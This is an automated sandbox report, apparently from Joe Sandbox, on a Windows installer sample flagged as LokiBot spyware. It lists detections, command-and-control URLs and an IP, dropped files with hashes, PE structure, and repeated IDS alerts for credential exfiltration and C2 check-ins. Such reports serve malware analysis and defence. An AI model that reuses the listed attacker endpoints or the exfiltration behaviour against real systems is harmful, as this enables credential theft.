              2.0.U001P56ybm.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.2.U001P56ybm.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.0.U001P56ybm.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
              2.0.U001P56ybm.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.0.U001P56ybm.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.0.U001P56ybm.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.2.U001P56ybm.exe.2430000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.0.U001P56ybm.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.0.U001P56ybm.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.1.U001P56ybm.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://194.85.248.167/imt/fre.php100%Avira URL Cloudmalware
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://194.85.248.167/imt/fre.phptrue
              • Avira URL Cloud: malware
              		unknown
              http://kbfvzoboss.bid/alien/fre.phptrue
              • URL Reputation: safe
              		unknown
              http://alphastand.win/alien/fre.phptrue
              • URL Reputation: safe
              		unknown
              http://alphastand.trade/alien/fre.phptrue
              • URL Reputation: safe
              		unknown
              http://alphastand.top/alien/fre.phptrue
              • URL Reputation: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nsis.sf.net/NSIS_ErrorU001P56ybm.exefalse
                		high
                http://nsis.sf.net/NSIS_ErrorErrorU001P56ybm.exefalse
                  		high
                  http://www.ibsensoftware.com/U001P56ybm.exe, U001P56ybm.exe, 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, U001P56ybm.exe, 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  194.85.248.167
                  		unknownRussian Federation
                  		35478DATACENTERROtrue

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:528740
                  Start date:25.11.2021
                  Start time:18:21:15
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 41s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:U001P56ybm.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:22
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@3/4@0/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 63.3% (good quality ratio 61.1%)
                  • Quality average: 78.7%
                  • Quality standard deviation: 27.6%
                  HCA Information:
                  • Successful, ratio: 95%
                  • Number of executed functions: 54
                  • Number of non-executed functions: 66
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/528740/sample/U001P56ybm.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  18:22:21API Interceptor48x Sleep call for process: U001P56ybm.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  194.85.248.167xA7ry4Ewuk.exeGet hashmaliciousBrowse
                  • 194.85.248.167/imt/fre.php

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  DATACENTERROmtSgtqMMFl.exeGet hashmaliciousBrowse
                  • 194.85.248.229
                  W7UbgU8x18.exeGet hashmaliciousBrowse
                  • 194.85.248.219
                  SK TAX INV.exeGet hashmaliciousBrowse
                  • 194.85.248.250
                  xA7ry4Ewuk.exeGet hashmaliciousBrowse
                  • 194.85.248.167
                  Sales Pro forma invoice_SO0005303101427.docxGet hashmaliciousBrowse
                  • 194.85.248.219
                  Statement from QNB.exeGet hashmaliciousBrowse
                  • 194.85.248.156
                  CV.exeGet hashmaliciousBrowse
                  • 194.85.248.250
                  INV.exeGet hashmaliciousBrowse
                  • 194.85.248.250
                  CV.exeGet hashmaliciousBrowse
                  • 194.85.248.250
                  TMR590241368.exeGet hashmaliciousBrowse
                  • 194.85.248.115
                  vIyyHkRXJnGet hashmaliciousBrowse
                  • 194.85.250.154
                  267A80yAhpGet hashmaliciousBrowse
                  • 194.85.250.154
                  QJYxAALd23Get hashmaliciousBrowse
                  • 194.85.250.154
                  z4bJfjXDDQGet hashmaliciousBrowse
                  • 194.85.250.154
                  XXaLHoecGpGet hashmaliciousBrowse
                  • 194.85.250.154
                  AGiCic4uDzGet hashmaliciousBrowse
                  • 194.85.250.154
                  3B3BMxYG8nGet hashmaliciousBrowse
                  • 194.85.250.154
                  6WMo1OYmk3Get hashmaliciousBrowse
                  • 194.85.250.154
                  dycuTng5W8Get hashmaliciousBrowse
                  • 194.85.250.154
                  xINX4f5M8sGet hashmaliciousBrowse
                  • 194.85.250.154

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\9bx9q99412rjuw5u
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):217431
                  Entropy (8bit):7.987953901401436
                  Encrypted:false
                  SSDEEP:6144:/KdbhrnUV0fmvApS9oPiEPS3nwOJ2WF9WjNZHq98e2:/crneIEKqN2GWj3r
                  MD5:1B63DA395BAFC5116F3F6FF8AAD7A350
                  SHA1:372869F185066FED68D1573158761EB4859459DB
                  SHA-256:19D7869C47AF19341916AE58B2F82536CF130942C05DFEE3092C65CD0C9E897B
                  SHA-512:E9D93E22D5D4C547A80ACF658C4F2A6409CD00E88F73602789FEED597BEBB6073EEDDBE6A4439C3EC11A26C9EE5D9FF341BB1F8888BFEA751DFA7921E8FA5714
                  Malicious:false
                  Reputation:low
                  Preview: q.........Vl:....m.G.g...0.?#....P....`ZmNwW]&.?..s.........3J.I....".5...W....]A..&..yu....<..WP..........'g..$E...RU.`x.K.mlo.....|..t(Z.JV 4.....q..%M..h..H@]...C.0......2. )=I....n..LX.A..^.x....~!+q...6..J.6..Y.R..q.)4."..+.B.x>..R.,.d...4.<.".Vz0V.O..:...G.g..i0..#....P....`.mNw*]&j?..s...&.n.D.3J..\..`......$....v..'.,...I........o.)....z#..BL9R._..E...RU.]........p........M.i............^....!l2...o+Z...i...4.....e.{....G.B..nH.M..A.Z..c\.T..D....=g.;S.h."....B<.'...&.,.d...4.u....V'...d....g..j.0......P....`ZmNwW]&.?..{....t.b.3J.!X.....:..9. ....v..'.,...].+...o.)....z..a.`9.....E...RU.]......}...p........M.i............^....!l2...o+Z...i...4.....e.{...r.....nH.M..A.Z..c\.T..D....=g..q.)4.".0..B<.'.....,.d...4.u....V....:.m.G.g..0.?#....P....`ZmNwW]&.?..s.......D.3J.....q.....9$.....v..'.,..I........o.)....z#.a.`9.._..E...RU.]........p........M.i............^....!l2...o+Z...i...4.....e.{...r.....nH.M..A.Z..c\.T..D....=g.
                  C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):120320
                  Entropy (8bit):6.283877419444271
                  Encrypted:false
                  SSDEEP:1536:DkJ/CJk6kcjZwfqMkzLaRJ+cxfNdtTisu01vzG4CNrutUo7HC5mo5wTIDLmUleNg:c6+sz2+cjdx1lmNE7i5IIXRlCi3nJ
                  MD5:7464D22DB87D13EBEF8364866100E33C
                  SHA1:6A64B31B7EE5F853A1CC142D0B3300A796D21B28
                  SHA-256:8142F4110C4DAF020DF138E7A281FD19A3295AF855D7527177E5DAB204EE9D8F
                  SHA-512:E7366C3617B958B3A4FA55548DCE997BD335D7B871494154BA9BDFD077B4C2488D80C9EA571D171B3CCFC18A579ECE85E76AE54C14AF33306BB50AB48BF32631
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 23%
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0.Px^.Px^.Px^....Qx^.]*..px^.]*.._x^.]*..:x^.D.X.Rx^.D.Z.Sx^.D._.Ix^.Px_..x^..&Z.Qx^..&^.Qx^..&..Qx^..&\.Qx^.RichPx^.........PE..L......a...........!.....j...h............................................... ..........................................L...............................................................................@............................................text...dh.......j.................. ..`.bss....D................................rdata..FN.......P...n..............@..@.data...............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 1
                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):46
                  Entropy (8bit):1.0424600748477153
                  Encrypted:false
                  SSDEEP:3:/lbON:u
                  MD5:89CA7E02D8B79ED50986F098D5686EC9
                  SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                  SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                  SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: ........................................user.

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):7.929625872337307
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 92.16%
                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:U001P56ybm.exe
                  File size:301040
                  MD5:969e2ccfcacf3573de922d9bce81e3fd
                  SHA1:c3dd33a00d4dad9330d0c2dbc0c3b75396c70f8b
                  SHA256:4a059628d9f56799d68937821b355477502fe0704d41a75c372b1c036061d59f
                  SHA512:9a8e5104bc18ac2bb0987324ce0f602b26ee4435da9d8c869516052067b6d911e4cec839a5619553d15129b6652c75fa489710eca815496b688e25cfeced65bf
                  SSDEEP:6144:rGiOg+450MRKEIC/ICcr8Cnvvso/Y9oPiEPS3nwOJ2YF9WjNZHqo8eXzo9:P5vRYMICasowKqN24Wj3ro9
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                  File Icon

                  Icon Hash:b2a88c96b2ca6a72

                  Static PE Info

                  General

                  Entrypoint:0x4030e3
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:7fa974366048f9c551ef45714595665e

                  Entrypoint Preview

                  Instruction
                  sub esp, 00000180h
                  push ebx
                  push ebp
                  push esi
                  xor ebx, ebx
                  push edi
                  mov dword ptr [esp+18h], ebx
                  mov dword ptr [esp+10h], 00409158h
                  xor esi, esi
                  mov byte ptr [esp+14h], 00000020h
                  call dword ptr [00407030h]
                  push 00008001h
                  call dword ptr [004070B0h]
                  push ebx
                  call dword ptr [0040727Ch]
                  push 00000008h
                  mov dword ptr [0042EC18h], eax
                  call 00007FD554597328h
                  mov dword ptr [0042EB64h], eax
                  push ebx
                  lea eax, dword ptr [esp+34h]
                  push 00000160h
                  push eax
                  push ebx
                  push 00428F90h
                  call dword ptr [00407158h]
                  push 0040914Ch
                  push 0042E360h
                  call 00007FD554596FDFh
                  call dword ptr [004070ACh]
                  mov edi, 00434000h
                  push eax
                  push edi
                  call 00007FD554596FCDh
                  push ebx
                  call dword ptr [0040710Ch]
                  cmp byte ptr [00434000h], 00000022h
                  mov dword ptr [0042EB60h], eax
                  mov eax, edi
                  jne 00007FD55459480Ch
                  mov byte ptr [esp+14h], 00000022h
                  mov eax, 00434001h
                  push dword ptr [esp+14h]
                  push eax
                  call 00007FD554596AC0h
                  push eax
                  call dword ptr [0040721Ch]
                  mov dword ptr [esp+1Ch], eax
                  jmp 00007FD554594865h
                  cmp cl, 00000020h
                  jne 00007FD554594808h
                  inc eax
                  cmp byte ptr [eax], 00000020h
                  je 00007FD5545947FCh
                  cmp byte ptr [eax], 00000022h
                  mov byte ptr [eax+eax+00h], 00000000h

                  Rich Headers

                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x74b00xb4.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x900.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x5b680x5c00False0.67722486413data6.48746502716IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata0x70000x129c0x1400False0.4337890625data5.04904254867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x90000x25c580x400False0.58203125data4.76995537906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc0x370000x9000xa00False0.4078125data3.93441125971IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x371900x2e8dataEnglishUnited States
                  RT_DIALOG0x374780x100dataEnglishUnited States
                  RT_DIALOG0x375780x11cdataEnglishUnited States
                  RT_DIALOG0x376980x60dataEnglishUnited States
                  RT_GROUP_ICON0x376f80x14dataEnglishUnited States
                  RT_MANIFEST0x377100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                  Imports

                  DLLImport
                  KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                  USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                  SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                  ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                  VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  11/25/21-18:22:15.658540TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974480192.168.2.3194.85.248.167
                  11/25/21-18:22:15.658540TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.3194.85.248.167
                  11/25/21-18:22:15.658540TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.3194.85.248.167
                  11/25/21-18:22:15.658540TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974480192.168.2.3194.85.248.167
                  11/25/21-18:22:18.837898TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974580192.168.2.3194.85.248.167
                  11/25/21-18:22:18.837898TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.3194.85.248.167
                  11/25/21-18:22:18.837898TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.3194.85.248.167
                  11/25/21-18:22:18.837898TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974580192.168.2.3194.85.248.167
                  11/25/21-18:22:21.772417TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.3194.85.248.167
                  11/25/21-18:22:21.772417TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.3194.85.248.167
                  11/25/21-18:22:21.772417TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.3194.85.248.167
                  11/25/21-18:22:21.772417TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.3194.85.248.167
                  11/25/21-18:22:21.949354TCP2025483ET TROJAN LokiBot Fake 404 Response8049746194.85.248.167192.168.2.3
                  11/25/21-18:22:23.379975TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.3194.85.248.167
                  11/25/21-18:22:23.379975TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.3194.85.248.167
                  11/25/21-18:22:23.379975TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.3194.85.248.167
                  11/25/21-18:22:23.379975TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.3194.85.248.167
                  11/25/21-18:22:23.474404TCP2025483ET TROJAN LokiBot Fake 404 Response8049747194.85.248.167192.168.2.3
                  11/25/21-18:22:25.292669TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.3194.85.248.167
                  11/25/21-18:22:25.292669TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.3194.85.248.167
                  11/25/21-18:22:25.292669TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.3194.85.248.167
                  11/25/21-18:22:25.292669TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.3194.85.248.167
                  11/25/21-18:22:25.843662TCP2025483ET TROJAN LokiBot Fake 404 Response8049748194.85.248.167192.168.2.3
                  11/25/21-18:22:26.868772TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.3194.85.248.167
                  11/25/21-18:22:26.868772TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.3194.85.248.167
                  11/25/21-18:22:26.868772TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.3194.85.248.167
                  11/25/21-18:22:26.868772TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.3194.85.248.167
                  11/25/21-18:22:26.965338TCP2025483ET TROJAN LokiBot Fake 404 Response8049749194.85.248.167192.168.2.3
                  11/25/21-18:22:28.257549TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.3194.85.248.167
                  11/25/21-18:22:28.257549TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.3194.85.248.167
                  11/25/21-18:22:28.257549TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.3194.85.248.167
                  11/25/21-18:22:28.257549TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.3194.85.248.167
                  11/25/21-18:22:28.383367TCP2025483ET TROJAN LokiBot Fake 404 Response8049750194.85.248.167192.168.2.3
                  11/25/21-18:22:29.608133TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.3194.85.248.167
                  11/25/21-18:22:29.608133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.3194.85.248.167
                  11/25/21-18:22:29.608133TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.3194.85.248.167
                  11/25/21-18:22:29.608133TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.3194.85.248.167
                  11/25/21-18:22:30.439113TCP2025483ET TROJAN LokiBot Fake 404 Response8049751194.85.248.167192.168.2.3
                  11/25/21-18:22:31.618850TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.3194.85.248.167
                  11/25/21-18:22:31.618850TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.3194.85.248.167
                  11/25/21-18:22:31.618850TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.3194.85.248.167
                  11/25/21-18:22:31.618850TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.3194.85.248.167
                  11/25/21-18:22:32.376492TCP2025483ET TROJAN LokiBot Fake 404 Response8049752194.85.248.167192.168.2.3
                  11/25/21-18:22:35.179306TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.3194.85.248.167
                  11/25/21-18:22:35.179306TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.3194.85.248.167
                  11/25/21-18:22:35.179306TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.3194.85.248.167
                  11/25/21-18:22:35.179306TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.3194.85.248.167
                  11/25/21-18:22:35.268660TCP2025483ET TROJAN LokiBot Fake 404 Response8049755194.85.248.167192.168.2.3
                  11/25/21-18:22:37.775846TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.3194.85.248.167
                  11/25/21-18:22:37.775846TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.3194.85.248.167
                  11/25/21-18:22:37.775846TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.3194.85.248.167
                  11/25/21-18:22:37.775846TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.3194.85.248.167
                  11/25/21-18:22:39.011205TCP2025483ET TROJAN LokiBot Fake 404 Response8049756194.85.248.167192.168.2.3
                  11/25/21-18:22:40.734394TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.3194.85.248.167
                  11/25/21-18:22:40.734394TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.3194.85.248.167
                  11/25/21-18:22:40.734394TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.3194.85.248.167
                  11/25/21-18:22:40.734394TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.3194.85.248.167
                  11/25/21-18:22:41.150241TCP2025483ET TROJAN LokiBot Fake 404 Response8049757194.85.248.167192.168.2.3
                  11/25/21-18:22:44.172505TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.3194.85.248.167
                  11/25/21-18:22:44.172505TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.3194.85.248.167
                  11/25/21-18:22:44.172505TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.3194.85.248.167
                  11/25/21-18:22:44.172505TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.3194.85.248.167
                  11/25/21-18:22:44.258064TCP2025483ET TROJAN LokiBot Fake 404 Response8049758194.85.248.167192.168.2.3
                  11/25/21-18:22:45.537822TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.3194.85.248.167
                  11/25/21-18:22:45.537822TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.3194.85.248.167
                  11/25/21-18:22:45.537822TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.3194.85.248.167
                  11/25/21-18:22:45.537822TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.3194.85.248.167
                  11/25/21-18:22:46.363115TCP2025483ET TROJAN LokiBot Fake 404 Response8049759194.85.248.167192.168.2.3
